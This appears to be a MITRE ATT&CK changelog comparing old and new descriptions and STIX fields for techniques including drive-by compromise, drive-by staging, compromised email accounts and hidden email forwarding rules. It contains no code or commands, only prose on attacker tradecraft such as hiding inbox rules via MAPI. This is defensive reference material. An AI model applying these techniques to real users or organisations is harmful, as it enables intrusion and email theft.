external_references{'source_name': 'Microsoft Sub Takeover 2020', 'description': 'Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020.', 'url': 'https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover'}

[T1189] Drive-by Compromise

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
New Description
t1Adversaries may gain access to a system through a user visitt1Adversaries may gain access to a system through a user visit
>ing a website over the normal course of browsing. With this >ing a website over the normal course of browsing. With this 
>technique, the user's web browser is typically targeted for >technique, the user's web browser is typically targeted for 
>exploitation, but adversaries may also use compromised websi>exploitation, but adversaries may also use compromised websi
>tes for non-exploitation behavior such as acquiring [Applica>tes for non-exploitation behavior such as acquiring [Applica
>tion Access Token](https://attack.mitre.org/techniques/T1550>tion Access Token](https://attack.mitre.org/techniques/T1550
>/001).  Multiple ways of delivering exploit code to a browse>/001).  Multiple ways of delivering exploit code to a browse
>r exist, including:  * A legitimate website is compromised w>r exist (i.e.[Drive-by Target](https://attack.mitre.org/te
>here adversaries have injected some form of malicious code s>chniques/T1608/004)), including:  * A legitimate website is 
>uch as JavaScript, iFrames, and cross-site scripting. * Mali>compromised where adversaries have injected some form of mal
>cious ads are paid for and served through legitimate ad prov>icious code such as JavaScript, iFrames, and cross-site scri
>iders. * Built-in web application interfaces are leveraged f>pting * Script files served to a legitimate website from a p
>or the insertion of any other kind of object that can be use>ublicly writeable cloud storage bucket are modified by an ad
>d to display web content or contain a script that executes o>versary * Malicious ads are paid for and served through legi
>n the visiting client (e.g. forum posts, comments, and other>timate ad providers (i.e., [Malvertising](https://attack.mit
> user controllable web content).  Often the website used by >re.org/techniques/T1583/008)) * Built-in web application int
>an adversary is one visited by a specific community, such as>erfaces are leveraged for the insertion of any other kind of
> government, a particular industry, or region, where the goa> object that can be used to display web content or contain a
>l is to compromise a specific user or set of users based on > script that executes on the visiting client (e.g. forum pos
>a shared interest. This kind of targeted campaign is often r>ts, comments, and other user controllable web content).  Oft
>eferred to a strategic web compromise or watering hole attac>en the website used by an adversary is one visited by a spec
>k. There are several known examples of this occurring.(Citat>ific community, such as government, a particular industry, o
>ion: Shadowserver Strategic Web Compromise)  Typical drive-b>r region, where the goal is to compromise a specific user or
>y compromise process:  1. A user visits a website that is us> set of users based on a shared interest. This kind of targe
>ed to host the adversary controlled content. 2. Scripts auto>ted campaign is often referred to a strategic web compromise
>matically execute, typically searching versions of the brows> or watering hole attack. There are several known examples o
>er and plugins for a potentially vulnerable version.      * >f this occurring.(Citation: Shadowserver Strategic Web Compr
>The user may be required to assist in this process by enabli>omise)  Typical drive-by compromise process:  1. A user visi
>ng scripting or active website components and ignoring warni>ts a website that is used to host the adversary controlled c
>ng dialog boxes. 3. Upon finding a vulnerable version, explo>ontent. 2. Scripts automatically execute, typically searchin
>it code is delivered to the browser. 4. If exploitation is s>g versions of the browser and plugins for a potentially vuln
>uccessful, then it will give the adversary code execution on>erable version.      * The user may be required to assist in
> the user's system unless other protections are in place.   > this process by enabling scripting or active website compon
>  * In some cases a second visit to the website after the in>ents and ignoring warning dialog boxes. 3. Upon finding a vu
>itial scan is required before exploit code is delivered.  Un>lnerable version, exploit code is delivered to the browser. 
>like [Exploit Public-Facing Application](https://attack.mitr>4. If exploitation is successful, then it will give the adve
>e.org/techniques/T1190), the focus of this technique is to e>rsary code execution on the user's system unless other prote
>xploit software on a client endpoint upon visiting a website>ctions are in place.     * In some cases a second visit to t
>. This will commonly give an adversary access to systems on >he website after the initial scan is required before exploit
>the internal network instead of external systems that may be> code is delivered.  Unlike [Exploit Public-Facing Applicati
> in a DMZ.  Adversaries may also use compromised websites to>on](https://attack.mitre.org/techniques/T1190), the focus of
> deliver a user to a malicious application designed to [Stea> this technique is to exploit software on a client endpoint 
>l Application Access Token](https://attack.mitre.org/techniq>upon visiting a website. This will commonly give an adversar
>ues/T1528)s, like OAuth tokens, to gain access to protected >y access to systems on the internal network instead of exter
>applications and information. These malicious applications h>nal systems that may be in a DMZ.  Adversaries may also use 
>ave been delivered through popups on legitimate websites.(Ci>compromised websites to deliver a user to a malicious applic
>tation: Volexity OceanLotus Nov 2017)>ation designed to [Steal Application Access Token](https://a
 >ttack.mitre.org/techniques/T1528)s, like OAuth tokens, to ga
 >in access to protected applications and information. These m
 >alicious applications have been delivered through popups on 
 >legitimate websites.(Citation: Volexity OceanLotus Nov 2017)

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2022-03-08 21:11:47.798000+00:002023-04-14 23:58:45.490000+00:00
descriptionAdversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser exist, including: * A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting. * Malicious ads are paid for and served through legitimate ad providers. * Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content). Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by compromise process: 1. A user visits a website that is used to host the adversary controlled content. 2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes. 3. Upon finding a vulnerable version, exploit code is delivered to the browser. 4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered. Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including: * A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting * Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary * Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008)) * Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content). Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by compromise process: 1. A user visits a website that is used to host the adversary controlled content. 2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes. 3. Upon finding a vulnerable version, exploit code is delivered to the browser. 4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered. Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)
x_mitre_data_sources[2]Network Traffic: Network Traffic ContentProcess: Process Creation
x_mitre_version1.41.5
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1608.004] Stage Capabilities: Drive-by Target

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may prepare an operational environment to infectt1Adversaries may prepare an operational environment to infect
> systems that visit a website over the normal course of brow> systems that visit a website over the normal course of brow
>sing. Endpoint systems may be compromised through browsing t>sing. Endpoint systems may be compromised through browsing t
>o adversary controlled sites, as in [Drive-by Compromise](ht>o adversary controlled sites, as in [Drive-by Compromise](ht
>tps://attack.mitre.org/techniques/T1189). In such cases, the>tps://attack.mitre.org/techniques/T1189). In such cases, the
> user's web browser is typically targeted for exploitation (> user's web browser is typically targeted for exploitation (
>often not requiring any extra user interaction once landing >often not requiring any extra user interaction once landing 
>on the site), but adversaries may also set up websites for n>on the site), but adversaries may also set up websites for n
>on-exploitation behavior such as [Application Access Token](>on-exploitation behavior such as [Application Access Token](
>https://attack.mitre.org/techniques/T1550/001). Prior to [Dr>https://attack.mitre.org/techniques/T1550/001). Prior to [Dr
>ive-by Compromise](https://attack.mitre.org/techniques/T1189>ive-by Compromise](https://attack.mitre.org/techniques/T1189
>), adversaries must stage resources needed to deliver that e>), adversaries must stage resources needed to deliver that e
>xploit to users who browse to an adversary controlled site. >xploit to users who browse to an adversary controlled site. 
>Drive-by content can be staged on adversary controlled infra>Drive-by content can be staged on adversary controlled infra
>structure that has been acquired ([Acquire Infrastructure](h>structure that has been acquired ([Acquire Infrastructure](h
>ttps://attack.mitre.org/techniques/T1583)) or previously com>ttps://attack.mitre.org/techniques/T1583)) or previously com
>promised ([Compromise Infrastructure](https://attack.mitre.o>promised ([Compromise Infrastructure](https://attack.mitre.o
>rg/techniques/T1584)).  Adversaries may upload or inject mal>rg/techniques/T1584)).  Adversaries may upload or inject mal
>icious web content, such as [JavaScript](https://attack.mitr>icious web content, such as [JavaScript](https://attack.mitr
>e.org/techniques/T1059/007), into websites.(Citation: FireEy>e.org/techniques/T1059/007), into websites.(Citation: FireEy
>e CFR Watering Hole 2012)(Citation: Gallagher 2015) This may>e CFR Watering Hole 2012)(Citation: Gallagher 2015) This may
> be done in a number of ways, including inserting malicious > be done in a number of ways, including:  * Inserting malici
>script into web pages or other user controllable web content>ous scripts into web pages or other user controllable web co
> such as forum posts. Adversaries may also craft malicious w>ntent such as forum posts * Modifying script files served to
>eb advertisements and purchase ad space on a website through> websites from publicly writeable cloud storage buckets * Cr
> legitimate ad providers. In addition to staging content to >afting malicious web advertisements and purchasing ad space 
>exploit a user's web browser, adversaries may also stage scr>on a website through legitimate ad providers (i.e., [Malvert
>ipting content to profile the user's browser (as in [Gather >ising](https://attack.mitre.org/techniques/T1583/008))  In a
>Victim Host Information](https://attack.mitre.org/techniques>ddition to staging content to exploit a user's web browser, 
>/T1592)) to ensure it is vulnerable prior to attempting expl>adversaries may also stage scripting content to profile the 
>oitation.(Citation: ATT ScanBox)  Websites compromised by an>user's browser (as in [Gather Victim Host Information](https
> adversary and used to stage a drive-by may be ones visited >://attack.mitre.org/techniques/T1592)) to ensure it is vulne
>by a specific community, such as government, a particular in>rable prior to attempting exploitation.(Citation: ATT ScanBo
>dustry, or region, where the goal is to compromise a specifi>x)  Websites compromised by an adversary and used to stage a
>c user or set of users based on a shared interest. This kind> drive-by may be ones visited by a specific community, such 
> of targeted campaign is referred to a strategic web comprom>as government, a particular industry, or region, where the g
>ise or watering hole attack.  Adversaries may purchase domai>oal is to compromise a specific user or set of users based o
>ns similar to legitimate domains (ex: homoglyphs, typosquatt>n a shared interest. This kind of targeted campaign is refer
>ing, different top-level domain, etc.) during acquisition of>red to a strategic web compromise or watering hole attack.  
> infrastructure ([Domains](https://attack.mitre.org/techniqu>Adversaries may purchase domains similar to legitimate domai
>es/T1583/001)) to help facilitate [Drive-by Compromise](http>ns (ex: homoglyphs, typosquatting, different top-level domai
>s://attack.mitre.org/techniques/T1189).>n, etc.) during acquisition of infrastructure ([Domains](htt
 >ps://attack.mitre.org/techniques/T1583/001)) to help facilit
 >ate [Drive-by Compromise](https://attack.mitre.org/technique
 >s/T1189).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-03-08 21:59:57.082000+00:002023-04-15 00:21:55.791000+00:00
descriptionAdversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox) Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including: * Inserting malicious scripts into web pages or other user controllable web content such as forum posts * Modifying script files served to websites from publicly writeable cloud storage buckets * Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008)) In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox) Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).
external_references[1]['source_name']FireEye CFR Watering Hole 2012ATT ScanBox
external_references[1]['description']Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.
external_references[1]['url']https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.htmlhttps://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
external_references[3]['source_name']ATT ScanBoxFireEye CFR Watering Hole 2012
external_references[3]['description']Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.
external_references[3]['url']https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attackshttps://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html
x_mitre_version1.21.3

[T1586.002] Compromise Accounts: Email Accounts

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may compromise email accounts that can be used dt1Adversaries may compromise email accounts that can be used d
>uring targeting. Adversaries can use compromised email accou>uring targeting. Adversaries can use compromised email accou
>nts to further their operations, such as leveraging them to >nts to further their operations, such as leveraging them to 
>conduct [Phishing for Information](https://attack.mitre.org/>conduct [Phishing for Information](https://attack.mitre.org/
>techniques/T1598) or [Phishing](https://attack.mitre.org/tec>techniques/T1598), [Phishing](https://attack.mitre.org/techn
>hniques/T1566). Utilizing an existing persona with a comprom>iques/T1566), or large-scale spam email campaigns. Utilizing
>ised email account may engender a level of trust in a potent> an existing persona with a compromised email account may en
>ial victim if they have a relationship, or knowledge of, the>gender a level of trust in a potential victim if they have a
> compromised persona. Compromised email accounts can also be> relationship with, or knowledge of, the compromised persona
> used in the acquisition of infrastructure (ex: [Domains](ht>. Compromised email accounts can also be used in the acquisi
>tps://attack.mitre.org/techniques/T1583/001)).  A variety of>tion of infrastructure (ex: [Domains](https://attack.mitre.o
> methods exist for compromising email accounts, such as gath>rg/techniques/T1583/001)).  A variety of methods exist for c
>ering credentials via [Phishing for Information](https://att>ompromising email accounts, such as gathering credentials vi
>ack.mitre.org/techniques/T1598), purchasing credentials from>a [Phishing for Information](https://attack.mitre.org/techni
> third-party sites, or by brute forcing credentials (ex: pas>ques/T1598), purchasing credentials from third-party sites, 
>sword reuse from breach credential dumps).(Citation: AnonHBG>brute forcing credentials (ex: password reuse from breach cr
>ary) Prior to compromising email accounts, adversaries may c>edential dumps), or paying employees, suppliers or business 
>onduct Reconnaissance to inform decisions about which accoun>partners for access to credentials.(Citation: AnonHBGary)(Ci
>ts to compromise to further their operation.  Adversaries ca>tation: Microsoft DEV-0537) Prior to compromising email acco
>n use a compromised email account to hijack existing email t>unts, adversaries may conduct Reconnaissance to inform decis
>hreads with targets of interest.>ions about which accounts to compromise to further their ope
 >ration. Adversaries may target compromising well-known email
 > accounts or domains from which malicious spam or [Phishing]
 >(https://attack.mitre.org/techniques/T1566) emails may evade
 > reputation-based email filtering rules.  Adversaries can us
 >e a compromised email account to hijack existing email threa
 >ds with targets of interest.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['Tristan Bennett, Seamless Intelligence', 'Bryan Onel']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 02:57:25.544000+00:002023-04-11 01:07:48.218000+00:00
descriptionAdversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)). A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries can use a compromised email account to hijack existing email threads with targets of interest.Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)). A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or [Phishing](https://attack.mitre.org/techniques/T1566) emails may evade reputation-based email filtering rules. Adversaries can use a compromised email account to hijack existing email threads with targets of interest.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft DEV-0537', 'description': 'Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.', 'url': 'https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/'}

[T1114] Email Collection

Current version: 2.4

Version changed from: 2.3 → 2.4

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 20:19:33.750000+00:002023-04-12 20:46:04.871000+00:00
x_mitre_data_sources[1]Logon Session: Logon Session CreationApplication Log: Application Log Content
x_mitre_data_sources[2]Application Log: Application Log ContentLogon Session: Logon Session Creation
x_mitre_version2.32.4

[T1114.003] Email Collection: Email Forwarding Rule

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may setup email forwarding rules to collect senst1Adversaries may setup email forwarding rules to collect sens
>itive information. Adversaries may abuse email-forwarding ru>itive information. Adversaries may abuse email forwarding ru
>les to monitor the activities of a victim, steal information>les to monitor the activities of a victim, steal information
>, and further gain intelligence on the victim or the victim’>, and further gain intelligence on the victim or the victim’
>s organization to use as part of further exploits or operati>s organization to use as part of further exploits or operati
>ons.(Citation: US-CERT TA18-068A 2018) Furthermore, email fo>ons.(Citation: US-CERT TA18-068A 2018) Furthermore, email fo
>rwarding rules can allow adversaries to maintain persistent >rwarding rules can allow adversaries to maintain persistent 
>access to victim's emails even after compromised credentials>access to victim's emails even after compromised credentials
> are reset by administrators.(Citation: Pfammatter - Hidden > are reset by administrators.(Citation: Pfammatter - Hidden 
>Inbox Rules) Most email clients allow users to create inbox >Inbox Rules) Most email clients allow users to create inbox 
>rules for various email functions, including forwarding to a>rules for various email functions, including forwarding to a
> different recipient. These rules may be created through a l> different recipient. These rules may be created through a l
>ocal email application, a web interface, or by command-line >ocal email application, a web interface, or by command-line 
>interface. Messages can be forwarded to internal or external>interface. Messages can be forwarded to internal or external
> recipients, and there are no restrictions limiting the exte> recipients, and there are no restrictions limiting the exte
>nt of this rule. Administrators may also create forwarding r>nt of this rule. Administrators may also create forwarding r
>ules for user accounts with the same considerations and outc>ules for user accounts with the same considerations and outc
>omes.(Citation: Microsoft Tim McMichael Exchange Mail Forwar>omes.(Citation: Microsoft Tim McMichael Exchange Mail Forwar
>ding 2)(Citation: Mac Forwarding Rules)  Any user or adminis>ding 2)(Citation: Mac Forwarding Rules)  Any user or adminis
>trator within the organization (or adversary with valid cred>trator within the organization (or adversary with valid cred
>entials) can create rules to automatically forward all recei>entials) can create rules to automatically forward all recei
>ved messages to another recipient, forward emails to differe>ved messages to another recipient, forward emails to differe
>nt locations based on the sender, and more. Adversaries may >nt locations based on the sender, and more. Adversaries may 
>also hide the rule by making use of the Microsoft Messaging >also hide the rule by making use of the Microsoft Messaging 
>API (MAPI) to modify the rule properties, making it hidden a>API (MAPI) to modify the rule properties, making it hidden a
>nd not visible from Outlook, OWA or most Exchange Administra>nd not visible from Outlook, OWA or most Exchange Administra
>tion tools.(Citation: Pfammatter - Hidden Inbox Rules)>tion tools.(Citation: Pfammatter - Hidden Inbox Rules)  In s
 >ome environments, administrators may be able to enable email
 > forwarding rules that operate organization-wide rather than
 > on individual inboxes. For example, Microsoft Exchange supp
 >orts transport rules that evaluate all mail an organization 
 >receives against user-specified conditions, then performs a 
 >user-specified action on mail that adheres to those conditio
 >ns.(Citation: Microsoft Mail Flow Rules 2023) Adversaries th
 >at abuse such features may be able to enable forwarding on a
 >ll or specific mail an organization receives. 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 20:19:33.416000+00:002023-04-12 20:47:47.583000+00:00
descriptionAdversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules) Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules) Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules) In some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives.
external_references[1]['source_name']US-CERT TA18-068A 2018Mac Forwarding Rules
external_references[1]['description']US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.Apple. (n.d.). Reply to, forward, or redirect emails in Mail on Mac. Retrieved June 22, 2021.
external_references[1]['url']https://www.us-cert.gov/ncas/alerts/TA18-086Ahttps://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac
external_references[4]['source_name']Mac Forwarding RulesMicrosoft Mail Flow Rules 2023
external_references[4]['description']Apple. (n.d.). Reply to, forward, or redirect emails in Mail on Mac. Retrieved June 22, 2021.Microsoft. (2023, February 22). Mail flow rules (transport rules) in Exchange Online. Retrieved March 13, 2023.
external_references[4]['url']https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/machttps://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'US-CERT TA18-068A 2018', 'description': 'US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-086A'}
x_mitre_contributorsLiran Ravich, CardinalOps
x_mitre_data_sourcesCommand: Command Execution

[T1564.008] Hide Artifacts: Email Hiding Rules

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
